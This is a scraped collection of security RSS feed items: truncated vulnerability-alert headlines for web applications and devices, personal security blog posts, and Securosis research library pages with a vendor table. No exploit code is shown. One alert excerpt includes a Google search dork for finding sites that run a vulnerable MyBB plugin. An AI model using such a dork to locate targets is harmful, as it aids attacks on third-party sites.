==> SanaNet Remote Sql Injection Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: SanaNet Remote Sql Injection Vulnerability Risk: Medium Text: Exploit Title : SanaNet Remote Sql Injection Vulnerability Author : N3TD3V!L Discovered By : Sec-Advisor...

==> Legrand-003598 / Bticino-F454 SCS Web Gateway Credentials leaks

http://securityreason.com/rss/SecurityAlert Topic: Legrand-003598 / Bticino-F454 SCS Web Gateway Credentials leaks Risk: Low Text:1. OVERVIEW Credential leaks lead to complete compromise of home automation system 2. BACKGROUND The 2 devices are id...

==> Wordpress Social Discussions Plugin Multiple Vulnerabilities

http://securityreason.com/rss/SecurityAlert Topic: Wordpress Social Discussions Plugin Multiple Vulnerabilities Risk: Medium Text:[waraxe-2012-SA#093] - Multiple Vulnerabilities in Wordpress Social Discussions Plugin == Author: Janek Vind "waraxe"...

==> Oracle WebCenter Sites Multiple vulnerabilities

http://securityreason.com/rss/SecurityAlert Topic: Oracle WebCenter Sites Multiple vulnerabilities Risk: Low Text:SEC Consult Vulnerability Lab Security Advisory < 20121017-2 > == title: Multiple vulner...

==> Videosmate Organizer 4.2 Authentication Bypass & Path Disclosure

http://securityreason.com/rss/SecurityAlert Topic: Videosmate Organizer 4.2 Authentication Bypass & Path Disclosure Risk: High Text: Vulnerable software: Videosmate Organizer V 4.2 (all versions) Vendor: http://videosmate.com/ Software License: Commercial...

==> MyBB Profile Albums 0.9 SQL Injection

http://securityreason.com/rss/SecurityAlert Topic: MyBB Profile Albums 0.9 SQL Injection Risk: Medium Text:# Exploit Title: Profile Albums MyBB plugin SQL Injection 0day # Google Dork: inurl:albums.php intext:"powered by Mybb" # Dat...

==> Sisfokol 4.0 Shell Upload

http://securityreason.com/rss/SecurityAlert Topic: Sisfokol 4.0 Shell Upload Risk: High Text:Undergroundthalo Hacking Team - Security Advisory Release Date. 13-Okt-2012 Last Update. - ...

==> TinyWebGallery 1.8.3 Remote Command Execution

http://securityreason.com/rss/SecurityAlert Topic: TinyWebGallery 1.8.3 Remote Command Execution Risk: High Text:TinyWebGallery 1.8.3 Remote Command Execution [] > Date : 05- 01- 2012 [] > Author : ...

==> CakePHP 2.2.0-RC2 XXE Injection

http://securityreason.com/rss/SecurityAlert Topic: CakePHP 2.2.0-RC2 XXE Injection Risk: Medium Text:# Exploit title: CakePHP XXE injection # Date: 01.07.2012 # Software Link: http://www.cakephp.org # Vulnerable version: 2.x ...

==> MangosWeb SQL Injection Vulnerability

http://securityreason.com/rss/SecurityAlert Topic: MangosWeb SQL Injection Vulnerability Risk: Medium Text:EXPLOIT TITLE: MangosWeb SQL Vulnerability DATE: 1/7/2012 BY Hood3dRob1n AFFECTED PRODUCTS: MangosWeb Enhanced Version 3.0.3...

==> Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities

http://securityreason.com/rss/SecurityAlert Topic: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities Risk: Medium Text:# Exploit Title: Wordpress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities # Date: 01/06/2012 # Author: Gianluca Brindi...

==> Wordpress Plugin BackWPup 1.6.1 Remote auth bypass

http://securityreason.com/rss/SecurityAlert Topic: Wordpress Plugin BackWPup 1.6.1 Remote auth bypass Risk: High Text:Sense of Security - Security Advisory - SOS-11-003 Release Date. 28-Mar-2011 Last Update. ...

==> Cyber Security Awareness Month

http://securitysumo.wordpress.com/feed/ The Internet Storm Center is offering daily tips on cyber-security, and specifically on incident handling, for the month of October. Check out the link to catch up on the daily tips or submit your own. Posted in Internet Security

==> Apple OS X Root Privilege Vulnerability

http://securitysumo.wordpress.com/feed/ If you are a Mac user, and haven’t seen the latest security vulnerability for OS X yet, Macshadows has an excellent writeup, with a temporary solution. Essentially, you need to open a terminal window and paste the following command: sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent After you press return, you will be prompted for your password. This [...]

==> Portable and Cross-platform Personal Password Manager

http://securitysumo.wordpress.com/feed/ Having to change between two different platforms (Windows and OS X), I wanted a functional password manager that was both portable and cross-platform. KeePass fits this requirement, and even has a Linux port and several other versions, as well. KeePass is open source and free. Download the portable apps version of KeePass here, and the [...]

==> Revision3 Denial of Service Attack

http://securitysumo.wordpress.com/feed/ Revision3 spent the Memorial Day weekend fighting off a denial of service attack. Their blog post summarizes the shocking and angering results. Check it out.

==> I Will Derive …

http://securitysumo.wordpress.com/feed/ One of the funniest videos I have seen in a while (at least from my totally nerd viewpoint):

==> MacBook Pro Hard Drive Replacement

http://securitysumo.wordpress.com/feed/ I upgraded the hard drive in my MacBook Pro today. It went pretty well, but is not really for the easily technologically intimidated! I followed (for the most part) the guide at ifixit. I ran into a few things that their guide didn’t include, so I thought I would add my experience here. First, as you [...]

==> MacBook and MacBook Pro USB Ports

http://securitysumo.wordpress.com/feed/ This week on MacBreak Weekly ( Episode 88 ) one of the hosts was having sound problems with a USB headset. They discussed the problem and one of the other hosts suggested changing the port the headset is on. A short discussion followed and here are the results. The MacBook has two USB ports on [...]

==> VMWare Fusion 2 Beta and Backtrack Wireless

http://securitysumo.wordpress.com/feed/ If you are trying to use VMWare Fusion 2.0 Beta and anything wireless in Backtrack, you might want to wait until the next release. I had all different kinds of trouble getting wireless USB dongles working with the setup. First Kismet would quit because of a TCP error. Then I had several kernel panics. Going [...]

==> What’s on my USB key?

http://securitysumo.wordpress.com/feed/ I’ve gathered many programs for my USB memory stick so I thought I would list them here. Actually, when you get down to it, I have a couple of memory sticks I keep with me most of the time. The first one is an older stick and is only 256 mb. However, it has a [...]

==> Ubuntu 8.04, VMWare Server, Wine and Warcraft, DVD Playback

http://securitysumo.wordpress.com/feed/ I installed the latest Ubuntu (8.04) last weekend and have been playing around with it a bit this week. Wow, is it nice! It is noticeably quicker than my 7.10 install. Of course, I did a complete wipe and reinstall, so that probably has something to do with the speed. I installed VMWare Server as [...]

==> Hardcoreview memory corruption

http://securityvulns.com/informer/rss.asp?l=EN Memory corruption on GIF parsing. Applications: Hardcoreview 6.11 (17.10.2012)

==> RSA Adaptive Authentication information leakage

http://securityvulns.com/informer/rss.asp?l=EN Applications: RSA Adaptive Authentication On-Premise 6.0 (17.10.2012)

==> graphicsmagick memory corruption

http://securityvulns.com/informer/rss.asp?l=EN Memory corruption on PNG parsing. Applications: GraphicsMagick 6.7 (17.10.2012)

==> Ezhometech EzServer memory corruption

http://securityvulns.com/informer/rss.asp?l=EN Memory corruption on RTMP AMF request parsing. Applications: EzServer 7.0 (17.10.2012)

==> Samsung Kies ActiveX multiple security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Code execution, files modification. Applications: Samsung Kies 2.3 (17.10.2012)

==> Valve Steam multiple security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Buffer overflows, code execution and game engine vulnerabilities can be exploited via the steam:// URI handler. (17.10.2012)

==> Visual Tools DVRs multiple security vulnerabilities

http://securityvulns.com/informer/rss.asp?l=EN Information leakage, code execution. (17.10.2012)

==> Data Security

http://securosis.com/feeds/research If you really think about it, technically all of “information security” is “data security”, but the reality is that most of our industry is focused on protecting networks and hosts, and very little is dedicated to protecting the information assets themselves. We here at Securosis prefer the term “Information-Centric Security”, since information is data with value (as opposed to just a bunch of 0’s and 1’s), but we know “data security” is more commonly used, and we’re not about to fight the industry. Since data security encompasses a wide range of tools, technologies, and processes, we highlight top-level management issues on this page, and encourage you to explore the subtopics for more details on database security, DLP, encryption, and other specific areas.

We keep all of our Research Library pages updated with our latest research. Content is added where it fits best, not in chronological order, so we mark new material with the month/year it’s added to help you find changes more easily.

Papers and Posts
------------

If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, and all public comments.)

1. The most important piece of work we’ve published on data security is The Business Justification for Data Security. We recommend you download the white paper, as it provides a condensed (and professionally edited) review; the individual blog posts add additional color and commentary: Part 1, part 2, part 3, part 4, part 5, and part 6. (03/09)
2. Tokenization vs. Encryption: Options for Compliance. This paper outlines the business uses for tokenization and examines the tradeoffs between tokenization and traditional encryption.
3. Next, read our series of posts on the Data Security Lifecycle, which shows how all the various bits and pieces plug together. Keep in mind that some of these technologies aren’t completely available yet, but the series should give you a good overview of how to take a big-picture approach to data security. Start with the Lifecycle, then read the details on the technologies, organized by phase: Part 1, Part 2, Part 3.
4. The general principles of Information-Centric/Data Security.
5. Data Verification Issues.
6. Data And Application Security Will Drive Most Security Growth For The Next 3-5 Years.
7. Defensive Security Stack, showing where data security fits in with network, host, and application security (I mention CMF, which is the same as DLP): Data Protection - It’s More than A + B + C.
8. We believe that two existing technologies are evolving into the “core” of data security: Data Loss Prevention and Database Activity Monitoring. They are evolving into what we call Content Monitoring and Protection (DLP, for protecting productivity applications and communications) and Application and Database Monitoring and Protection (DAM, for protecting applications and the data center). We define both technologies in Definitions: Content Monitoring and Protection and Application and Database Monitoring and Protection.
9. Continuation of Content Monitoring and Protection: How Data Loss Prevention and Database Activity Monitoring Will Connect.
10. Data classification comes up all the time when discussing data security. Here’s an overview that starts to introduce the idea of practical data classification: The Five Problems With Data Classification, an Introduction To Practical Data Classification. We followed it with a post: Practical Data Classification: Type 1, The Hasty Classification. But the truth is, classification is usually quite problematic, and we don’t recommend manual classification to most enterprise users, as we wrote in Data Classification is Dead. (We haven’t finished our data classification series yet.)
11. Related to data classification, here is a post on Information Governance.
12. Before you start digging in too deep on data security, we recommend you prepare by understanding your users and infrastructure, as we wrote in Information-Centric Security Tip: Know Your Users and Infrastructure.
13. File Activity Monitoring is an exciting new technology that finally gives us insight into not only how our files are used, but who the heck is accessing them, who should be accessing them, and when they violate security policies. We can finally do things like generate alerts when a sales guy starts sucking down all the customer files before moving to a competitor.

General Coverage
------------

1. Sorry, Data Labeling is Not the Same as DRM/ERM
2. Data Labels Suck
3. Security Requirements for Electronic Medical Records
4. The Data Breach Triangle
5. Data Harvesting and Privacy

Presentations
---------

These PDF versions of presentations may also be useful, although they don’t include any audio (for any audio/video, please see the next section).

* The Business Justification for Data Security presentation that Rich and Adrian gave in February 2009.
* Our presentation on Mobile Data Security for the Enterprise.
* Our presentation on Information Centric Data Security and the Data Centric Security Lifecycle.
* The current version of Pragmatic Data Security, which provides a good, practical process overview with specific implementation details.
* Presentation on Data Protection in the Enterprise. Kind of a corporate overview.
* Presentation on XML Security.

Podcasts, Webcasts and Multimedia
---------

We do not currently have any multimedia for this topic.

Vendors/Tools
---------

The following is an alphabetized and categorized list of vendors and products in this area (including any free tools we are aware of). It does not imply endorsement, and is meant to assist you should you start looking for tools. Please email info@securosis.com if you have any additions or corrections. Since data security is such a broad issue, please see the sub-categories for vendors and tools.

If much of this material seems somewhat generic, that’s because data/information-centric security is a fairly high-level topic. We really encourage you to learn about the specifics in the sub-categories in the navigation menu.

==> Upcoming Research

http://securosis.com/feeds/research The Securosis Research Agenda is a dynamic entity. We are constantly revisiting our research plans, so check back often to see what’s in the hopper:

* Understanding and Selecting a Web Application Firewall
* SIEM 2.0: Replacing Your SIEM Solution
* Securing Applications at Scale
* Masking for Compliance
* Code Security: Security for Developers
* Pragmatic Data Security
* Network Security Fundamentals
* Endpoint Security Fundamentals
* Database Security 2.0: Database Security for Relational and Non-relational Systems
* Understanding and Implementing Network Segregation
* Data Security for the Cloud

Some of these papers will be sponsored, some won’t, but all will be released for free under a Creative Commons license on our blog and within the Research Library.

==> All Research Papers

http://securosis.com/feeds/research

Application Security
* Pragmatic WAF Management: Giving Web Apps a Fighting Chance
* Building a Web Application Security Program

Cloud and Virtualization

Compliance
* Tokenization Guidance
* Tokenization vs. Encryption: Options for Compliance
* Data Encryption 101: A Pragmatic Approach to PCI

Data Security
* Understanding and Selecting Data Masking Solutions
* Implementing and Managing a Data Loss Prevention Solution
* Defending Data on iOS
* Understanding and Selecting a Database Security Platform
* Understanding and Selecting a File Activity Monitoring Solution
* Database Activity Monitoring: Software vs. Appliance
* The Securosis 2010 Data Security Survey
* Understanding and Selecting a Tokenization Solution
* Understanding and Selecting a DLP Solution
* Understanding and Selecting a Database Encryption or Tokenization Solution
* Low Hanging Fruit: Quick Wins with Data Loss Prevention (V2.0)
* Database Assessment
* Content Discovery Whitepaper
* Selecting a Database Activity Monitoring Solution

Endpoint Security
* The Endpoint Security Management Buyer’s Guide
* Endpoint Security Fundamentals
* Best Practices for Endpoint DLP
* Evolving Endpoint Malware Detection: Dealing with Advanced and Targeted Attacks

Network Security
* Network-based Malware Detection: Filling the Gaps of AV
* Applied Network Security Analysis: Moving from Data to Information
* Fact-Based Network Security: Metrics and the Pursuit of Prioritization
* Network Security in the Age of Any Computing
* Understanding and Selecting an Enterprise Firewall

Project Quant
* Malware Analysis Quant
* Measuring and Optimizing Database Security Operations (DBQuant)
* Network Security Ops Quant Metrics Model
* Network Security Operations Quant Report
* Project Quant Survey Results and Analysis
* Project Quant Metrics Model Report

Security Management
* Vulnerability Management Evolution: From Tactical Scanner to Strategic Platform
* Watching the Watchers: Guarding the Keys to the Kingdom (Privileged User Management)
* Security Management 2.0: Time to Replace Your SIEM?
* Security Benchmarking: Going Beyond Metrics
* React Faster and Better: New Approaches for Advanced Incident Response
* Monitoring up the Stack: Adding Value to SIEM
* Understanding and Selecting SIEM/Log Management
* The Business Justification for Data Security

==> Vendor List

http://securosis.com/feeds/research

| Company Name | Exhibitor Type | Booth Number | Sub-category | Category | Website | Notes |
|---|---|---|---|---|---|---|
| 3M Mobile Interactive Solutions Division | Exhibitor | 2740 | Mobile Security | Endpoint Security | http://solutions.3m.com/wps/portal/3M/en_US/Meetings/Home/ | |
| ActivIdentity | Exhibitor | 1128 | Authentication | Identity and Access Management | http://www.actividentity.com/ | |
| Advanced Product Design | Exhibitor | 340 | | | | |
| Advantech | Exhibitor | 217 | | | | |
| AFC Industries | Exhibitor | 235 | Furniture | Other | http://www.afcindustries.com/ | |
| Agiliance | Exhibitor | 2351 | Compliance | Security Management and Compliance | http://www.agiliance.com/ | |
| Akamai Technologies | Silver Sponsor | 2017 | Content Delivery | | http://www.akamai.com | |
| Alert Enterprise | Exhibitor | 351 | Compliance | Security Management and Compliance | http://www.alertenterprise.com/ | |
| Alert Logic | Exhibitor | 2529 | IDS/IPS | Network Security | http://www.alertlogic.com/ | |
| AlgoSec | Exhibitor | 856 | Firewalls | Network Security | http://www.algosec.com/en/index.php | |
| AlienVault | Exhibitor | 652 | SIEM/Log Management | Security Management and Compliance | http://www.alienvault.com/ | |
| Alta Associates Inc. | Exhibitor | 850 | Compliance | Security Management and Compliance | http://www.altaassociates.com/ | |
| AMAX Information Technologies | Exhibitor | 346 | | | http://www.amaxit.com/ | |
| American Portwell Technology, Inc. | Exhibitor | 628 | | | http://www.portwell.com/ | |
| Anakam, an Equifax Company | Exhibitor | 226 | Authentication | Identity and Access Management | http://www.anakam.com/ | |
| Anne Arundel Community College | Exhibitor | 2728 | Education | Other | http://www.aacc.edu/ | |
| Anonymizer, Inc. | Exhibitor | 2722 | Content Security | Network Security | http://www.anonymizer.com/ | |
| Antiy Labs | Partner Pavilion | 1541 | | Endpoint Security | http://www.antiy.net/ | |
| Anue Systems Inc. | Exhibitor | 2445 | Application Testing | Application Security | http://www.anuesystems.com/ | |
| APCON | Exhibitor | 832 | | | http://www.apcon.com/ | |
| Application Security, Inc. | Exhibitor | 639 | Database Security, Vulnerability Assessment | Data Security, Security Management and Compliance | http://www.appsecinc.com/ | |
| AppRiver | Exhibitor | 1059 | Managed Services | Email/Web Security | http://www.appriver.com/ | |
| Approva | Exhibitor | 428 | Compliance | Security Management and Compliance | http://www.approva.net/ | |
| Araknos SRL Unipersonale | Exhibitor | 347 | SIEM/Log Management | Security Management and Compliance | http://www.araknos.it/en/azienda/azienda.html | |
| ArcSight | Exhibitor | 931 | SIEM/Log Management | Security Management and Compliance | http://www.arcsight.com/ | |
| Armorize Technologies Inc. | Exhibitor | 329 | Web Application Assessment | Application Security | http://www.armorize.com/ | |
| Art of Defence GmbH | Partner Pavilion | 1350 | | | http://www.artofdefence.com/ | |
| Art of Defence GmbH | Exhibitor | 342 | Web App Firewalls | Application Security | http://www.artofdefence.com/ | |
| Arxan Technologies | Exhibitor | 328 | Secure Development | Application Security | http://www.arxan.com/ | |
| Astaro | Exhibitor | 2251 | Firewalls, Email Security Gateway, Web Security Gateway | Network Security, Email/Web Security | http://www.astaro.com/ | |
| AT&T | Exhibitor | 831 | | | http://www.att.com/ | |
| atsec information security | Partner Pavilion | 1350 | Compliance | Security Management and Compliance | http://www.atsec.com/ | |
| Authentify, Inc. | Exhibitor | 1029 | Authentication | Identity and Access Management | http://www.authentify.com/ | |
| Authernative, Inc. | Exhibitor | 550 | Authentication | Identity and Access Management | http://www.authernative.com/ | |
| Avenda Systems | Exhibitor | 318 | NAC | Network Security | http://www.avendasys.com/ | |
| Axway | Silver Sponsor | 2225 | | | http://www.axway.com/ | |
| BeCrypt Inc. | Exhibitor | 2129 | Disk Encryption | Endpoint Security | http://www.becrypt.com/ | |
| Beijing LinkTrust Technologies Development Co.,Ltd. | Partner Pavilion | 1541 | Perimeter Defense | Network Security | http://www.linktrust.com.cn/ | |
| Beijing Topsec Science and Technology Co.,Ltd | Partner Pavilion | 1541 | | | | |
| Beijing Venustech Inc. | Partner Pavilion | 1541 | Perimeter Defense | Network Security | http://english.venustech.com.cn/ | |
| Beijing Zhongguancun Overseas Science Park | Exhibitor | 1541 | | | http://www.zgc.gov.cn/english/ | |
| BeyondTrust Corp. | Exhibitor | 945 | Anti-Malware | Endpoint Security | http://www.beyondtrust.com/ | |
| Bit9, Inc. | Exhibitor | 2621 | Anti-Malware | Endpoint Security | http://www.bit9.com/ | |
| Bivio Networks | Exhibitor | 2133 | Content Security | Network Security | http://www.bivio.net/ | |
| Black Box Network Services | Exhibitor | 2550 | | | http://www.blackbox.com/ | |
| BlockMaster AB | Exhibitor | 2425 | Mobile Security | Endpoint Security | http://www.blockmastersecurity.com/ | |
| Blue Coat Systems, Inc. | Gold Sponsor | 1139 | Threat Mgmt, Anti-Malware, Web Security Gateway | Network Security, Email/Web Security | http://www.bluecoat.com/ | |
| BluePoint Security | Exhibitor | 2559 | Cloud Security | Virtualization and Cloud | http://www.bluepointsecurity.com/ | |
| Brainloop Inc. | Partner Pavilion | 1350 | Access Management | Data Security | http://www.brainloop.com/ | |
| BreakingPoint Systems, Inc. | Exhibitor | 951 | Monitoring | Network Security | http://www.breakingpointsystems.com/ | |
| BroadWeb Corporation | Partner Pavilion | 1541 | Perimeter Defense | Network Security | http://www.broadweb.com/ | |
| Bsafe Information Systems Inc. | Exhibitor | 855 | Compliance | Security Management and Compliance | http://www.bsafesolutions.com/ | |
| BSI | Partner Pavilion | 1344 | | | http://www.bsigroup.com/ | |
| C4ISR Journal | Exhibitor | 2650 | Publication | Other | http://www.c4isrjournal.com | |
| CA Technologies | Platinum Sponsor | 1533 | DLP, SIEM/Log Management, Compliance | Data Security, Security Management and Compliance | http://ca.com/ | |
| Capella University | Exhibitor | 251 | Education | Other | http://www.capella.edu/ | |
| Cavium Networks | Exhibitor | 528 | | | http://www.caviumnetworks.com/ | Hardware |
| CCSO.com | Exhibitor | 2619 | | | http://www.ccso.com/ | Disassembler |
| Celestix Networks | Exhibitor | 852 | Perimeter Defense | Network Security | http://www.celestix.com/ | |
| Cenzic, Inc. | Exhibitor | 332 | Application Testing, Application Assessment | Application Security | http://www.cenzic.com/ | |
| Check Point Software Technologies | Exhibitor | 2317 | Firewalls, IDS/IPS, Remote Access, Disk Encryption | Network Security, Endpoint Security | http://www.checkpoint.com/ | |
| Cherry | Exhibitor | 755 | | | http://www.cherrycorp.com/ | Hardware |
| China quality certification certificate authority | Partner Pavilion | 1541 | Compliance | Security Management and Compliance | http://www.cqc.com.cn/english/ | |
| CipherOptics | Exhibitor | 1923 | Encryption | Data Security | http://www.cipheroptics.com/ | |
| Cisco | Global Platinum Sponsor | 1717 | Firewalls, Remote Access, Threat Mgmt, Email Security Gateway, Web Security Gateway, Managed Services | Network Security, Email/Web Security | http://www.cisco.com/ | |
| Cloud Security Alliance | Exhibitor | 2718 | | | http://www.cloudsecurityalliance.org/ | |
| Comodo Group, Inc. | Exhibitor | 2439 | Endpoint Defense | Endpoint Security | http://www.comodo.com/ | |
| CoreTrace Corporation | Exhibitor | 1963 | Anti-Malware | Endpoint Security | http://www.coretrace.com/ | |
| CORISECIO GmbH | Partner Pavilion | 1350 | | | http://www.corisecio.com/ | |
| Coverity | Exhibitor | 333 | Secure Development | Application Security | http://www.coverity.com/ | |
| Critical Watch | Exhibitor | 950 | Compliance | Security Management and Compliance | http://www.criticalwatch.com/ | |
| Cryptography Research, Inc. | Exhibitor | 2233 | | | http://www.cryptography.com/ | Secure dev hardware |
| cv cryptovision GmbH | Partner Pavilion | 1350 | Encryption | Data Security | http://www.cryptovision.com/ | |
| Cyber-Ark Software, Inc. | Exhibitor | 2045 | Authentication | Identity and Access Management | http://www.cyber-ark.com/ | |
| Cybera | Exhibitor | 752 | Compliance | Security Management and Compliance | http://www.cybera.com/ | |
| Cyberoam | Exhibitor | 723 | Perimeter Defense | Network Security | http://www.cyberoam.com/ | |
| Damballa | Exhibitor | 433 | Endpoint Defense | Endpoint Security | http://www.damballa.com/ | |
| Dasient, Inc. | Exhibitor | 554 | Endpoint Defense | Endpoint Security | http://www.dasient.com/ | |
| Dataguise Inc. | Exhibitor | 645 | Database Security | Data Security | http://www.dataguise.com/ | |
| Department of Homeland Security/ US-CERT | Exhibitor | 457 | | | http://www.us-cert.gov/ | |
| DeviceLock | Exhibitor | 2228 | Mobile Security | | | |

==> Welcome to Securosis Research

http://securosis.com/feeds/research Download the Coverage Map (PDF)

* About Our Research
* About the Research Library

About Our Research
--------------

Securosis is a new breed of IT research firm focusing on the broad information security and compliance markets. As opposed to relying on big sales forces and high pay walls, we publish our primary research for free on our blog. Yeah, we know, it’s different and scary. But it works.

In terms of our primary research model, our focus is to help mid-market IT and security professionals successfully execute on their projects, by providing actionable information to accelerate their progress. It doesn’t mean our research isn’t relevant to large enterprises and government agencies. It just means our primary constituency is someone who wears a security hat as well as a number of other hats on a daily basis.

Each week, Securosis publishes a ton of research on what’s happening in the security business, all focused on keeping our readers connected and focused on what’s important, not on the noise. Our weekly research includes:

* Securosis FireStarter: Periodically Securosis holds an internal, no-holds-barred research meeting. Each analyst prepares a topic and the other analysts typically rip it to shreds. The end result is a thought generator that challenges our perspectives and demands further discussion. We publish the findings of that research to “stir the pot” a bit and get the echo chamber vibrating.
* Securosis Incite: Something we’ve adopted from Security Incite is a hard-hitting summary of the news happening in our industry. Each Wednesday we send out 7-8 links with analysis of what’s happening out there and why it’s important.
* Securosis Weekly Summary: Just in case you don’t have anything better to do over the weekend, on Friday we send out a list of things we’ve posted on the blog and also each analyst’s favorite outside post. This keeps you up to date on what we’ve been up to.
* Ad Hoc Posts: Yes, the art of blogging is far from dead. During the week, once or twice a day we post something of interest. It could be a more detailed treatment of an announcement, something that’s been bothering us, or part of our primary research (which is always posted to the blog first). In case you are some kind of dinosaur and don’t use an RSS reader, you can sign up for email distribution of our blog posts. Sign up for the Daily Digest or the Weekly Summary.

For each of our coverage areas, we have a defined hierarchy of primary research documents we prepare to ensure deep coverage and actionable advice:

* Understanding and Selecting: This series of posts provides the backdrop for each security domain. The research takes a product category perspective and helps readers understand why and how they’d use certain technology, and what is important when evaluating products and offerings. As an example, check out our work on Understanding and Selecting a Database Activity Monitoring Solution.
* Building a [Topic] Program: The next level in our research is how to structure a security program to solve a specific problem. This is about more than just figuring out what product to buy; it covers the underlying processes and techniques required to address a specific problem. You can see our Building a Web Application Security Program for an example of this research.
* Project Quant: For a select few coverage areas, we go very deep and actually define very granular process maps and establish metrics to quantify those processes for an aspect of security. We do a public survey to make sure we nail the process map and publish the survey results when we get a statistically significant sample. Check out Project Quant for Patch Management to understand this research.
About the Research Library
--------------

Are you tired of having to hunt through screen after screen of crappy search results just to find the few bits of information you need? Or trawl through endless forums and unrelated blog entries just to educate yourself on a new topic? We are too… that’s why we created the Securosis Research Library.

The Library is designed to be your first stop when researching a new topic. We’ve collected our best blog posts, white papers, and multimedia materials together in a structure designed to help you find what you need as quickly as possible. Unlike search results or a wiki, we’ve organized the material for each topic in the order we think it will be most useful, rather than by date or some other arbitrary sorting method. We don’t cover every security topic you could think of, but we’re constantly expanding into new areas and filling in coverage that’s lighter than we’d like.

Where possible, for technology-related topics we include a list of Free/Open Source and commercial products. We try to keep these lists updated, but if you see something we are missing please email us so we can add it. This is just a list of what’s available in alphabetical order – we aren’t endorsing any particular products.

We update the material in the Library on an ongoing basis, and each entry is dated with the last update. If you’d like to keep your own copy, just subscribe to the RSS feed. Since we update the date on each entry when we make changes, your RSS reader should keep a current, local copy of the entire library. Pretty cool, eh? We hope you find it useful, and please email us with any suggestions, errors, or omissions.

==> Endpoint Security

http://securosis.com/feeds/research Stand by for our endpoint security page.

==> Security Management

http://securosis.com/feeds/research Stand by for our security management page.

==> Network Security

http://securosis.com/feeds/research Stand by for our network security page.

==> Cloud and Virtualization

http://securosis.com/feeds/research This is one of the newest areas of our coverage, and although cloud computing and virtualization are distinct technologies, they are very closely related.

==> Compliance

http://securosis.com/feeds/research

Papers and Posts
------------

This section covers compliance topics and several general security issues related to compliance with industry and governmental regulations. This is a new section for us, and while we have a ton of information on this topic, we will be evolving how we present the material over time. These articles are strategic in nature, but we will be adding videos and podcasts for hands-on guidance in the coming weeks.

General Coverage
------------

1. It Isn’t Risk Management If You Can’t Lose
2. Visa’s Data Field Encryption
3. Tokenization Will Become the Dominant Payment Transaction Architecture
4. Some Follow-Up Questions for Bob Russo, General Manager of the PCI Council
5. We Know How Breaches Happen
6. New Details, and Lessons, on Heartland Breach
7. Heartland Hackers Caught; Answers and Questions
8. An Open Letter to Robert Carr, CEO of Heartland Payment Systems

Presentations
---------

* Presentation on Tokenization Guidance for PCI.
* Presentation on Data Breaches and Encryption.
* Presentation on Data Protection in the Enterprise. This is a corporate overview.
* Presentation on Encrypting Mobile Data for the Enterprise.

Podcasts, Webcasts and Multimedia
---------

We do not currently have any multimedia for this topic. Please email info@securosis.com if you have any additions or corrections.

==> Database Security

http://securosis.com/feeds/research

Database Security is one of the broader topics that Securosis covers. Database servers are highly complex systems – storing, organizing, and managing data for a wide array of applications. Most mid-sized firms have dozens of them, some embedded in desktop applications, while others serve core systems such as web commerce, financials, manufacturing, and inventory management. A Fortune 100 company may have thousands.

To address the wide range of offerings and uses, we will cover database security from two different angles. The first is the security of the application itself, and the second is the use and security of the data within the database. Database Vulnerability Assessment (VA), access control & user management, and patch management are all areas where preventative security measures can be applied to a database system. For securing the data itself, we include such topics as Database Activity Monitoring (DAM), auditing, data obfuscation/masking, and database encryption. Technologies like database auditing can be used for either, but we include them in the latter category because they provide a transactional view of database usage. We also include some of the database programming guidelines that can help protect databases from SQL injection and other attacks against application logic.

Papers and Posts
------------

If you are just getting started, we recommend you read the following blog posts and papers in order. (In keeping with our Totally Transparent Research policy, for sponsored papers we also link to the original blog posts so you can see how the content was developed, along with the comments.)

1. Understanding and Selecting a Database Security Platform is our new comprehensive database security paper.
2. Our Database Activity Monitoring research paper remains a reader favorite and can be downloaded here: “Understanding and Selecting a Database Activity Monitoring Solution” white paper.
3. Understanding and Selecting a Database Assessment Solution is now available. We are very happy with this paper. We have even been told by database assessment vendors that their product teams learned some tips from this paper, and we think you will too.
4. Our Understanding and Selecting a Database Encryption or Tokenization Solution paper is available.
5. Database Audit Events is a comprehensive list of database events available through native database auditing techniques.
6. Many supporting posts on Database Encryption: Application vs. Database Encryption and Database Encryption: Fact vs. Fiction, Format and Datatype Preserving Encryption, An Introduction to Database Encryption, Database Encryption Misconceptions, Media encryption options for databases, and threat vectors to consider when encrypting data.
7. The 5 laws of Data Masking.

Database Security Patch Coverage
------------

1. Oracle Critical Patch Update, July 2009.

General Coverage
------------

1. SQL Injection Prevention
2. Database Audit Performance in this Friday Summary introduction
3. Database Encryption Benchmarking
4. Three Database Roles: Programmer, DBA, Architect
5. Database Security: The Other First Steps
6. Sentrigo and MS SQL Server Vulnerability.
7. Amazon’s SimpleDB.
8. Information on Weak Database Password Checkers.
9. Database Connections and Trust (databases are not typically set up to validate incoming connections against SQL injection and misused credentials), and this post recommending Stored Procedures to address SQL Injection attacks.
10. Separation of Duties and Functions through roles and programmatic elements, and putting some of the web application code back into the database.
11. Native database primary key generation to avoid data leakage and inference problems, and additional comments on Inference Attacks.
12. Your Top 5 Database Security Resolutions.
13. Posts on separation of duties: Who “Owns” Database Security, and the follow-up: DBAs should NOT own DAM & Database Security.
14. A look at general threats around using External Database Procedures and variants in relational databases.
15. Database Audit Events.
16. Database Security Mass-Market Update and Friday Summary - May 29, 2009
17. Database Patches, Ad Nauseum
18. Acquisitions and Strategy
19. Comments on Oracle’s Acquisition of Sun
20. Oracle CPU for April 2009
21. Netezza buys Tizor
22. More Configuration and Assessment Options. Discusses recent Oracle and Tenable advancements.
23. Policies and Security Products applies to database security as well as other product lines.
24. Oracle Security Update for January 2009.
25. Responding to the SQL Server Zero Day: Security Advisory 961040 includes some recommendations and workarounds.
26. Will Database Security Vendors Disappear? and Rich’s follow-on Database Security Market Challenges considerations for this market segment.
27. Behavioral Monitoring for database security.
28. NitroSecurity acquired RippleTech.
29. Database Monitoring is as big or bigger than DLP.

Presentations
---------

* Rich’s presentation on Understanding and Selecting a Database Activity Monitoring Solution. (PDF)
* Oracle Database Security in a Down Economy. (PDF)

Podcasts, Webcasts and Multimedia
---------

None at this time.

Vendors/Tools
---------

